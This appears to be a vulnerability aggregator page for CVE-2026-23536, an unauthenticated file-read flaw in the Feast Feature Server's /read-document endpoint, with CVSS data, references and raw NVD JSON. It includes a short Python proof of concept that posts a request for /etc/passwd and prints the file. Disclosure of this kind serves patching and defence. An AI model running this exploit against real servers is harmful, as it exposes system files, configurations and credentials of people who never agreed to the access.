CVE-2026-23536

Description

A security issue was discovered in the Feast Feature Server's `/read-document` endpoint that allows an unauthenticated remote attacker to read any file accessible to the server process. By sending a specially crafted HTTP POST request, an attacker can bypass intended access restrictions to potentially retrieve sensitive system files, application configurations, and credentials.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Feast Feature Server (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Define the target URL (replace with actual target)
target_url = "http://localhost:8080/read-document"

# Malicious payload attempting to read /etc/passwd
payload = {
    "path": "/etc/passwd"
}

try:
    # Send POST request without authentication
    response = requests.post(target_url, json=payload, timeout=10)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Exploit successful! File content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23536
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23536
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23536/
[4] VulDB https://vuldb.com/cve/CVE-2026-23536
[5] https://access.redhat.com/security/cve/CVE-2026-23536
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2429302

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23536", "sourceIdentifier": "[email protected]", "published": "2026-03-20T22:16:27.087", "lastModified": "2026-03-23T14:32:02.800", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue was discovered in the Feast Feature Server's `/read-document` endpoint that allows an unauthenticated remote attacker to read any file accessible to the server process. By sending a specially crafted HTTP POST request, an attacker can bypass intended access restrictions to potentially retrieve sensitive system files, application configurations, and credentials."}, {"lang": "es", "value": "Se descubrió una vulnerabilidad de seguridad en el endpoint '/read-document' del Feast Feature Server que permite a un atacante remoto no autenticado leer cualquier archivo accesible para el proceso del servidor. Al enviar una solicitud HTTP POST especialmente diseñada, un atacante puede eludir las restricciones de acceso previstas para recuperar potencialmente archivos de sistema sensibles, configuraciones de aplicaciones y credenciales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-23536", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429302", "source": "[email protected]"}]}}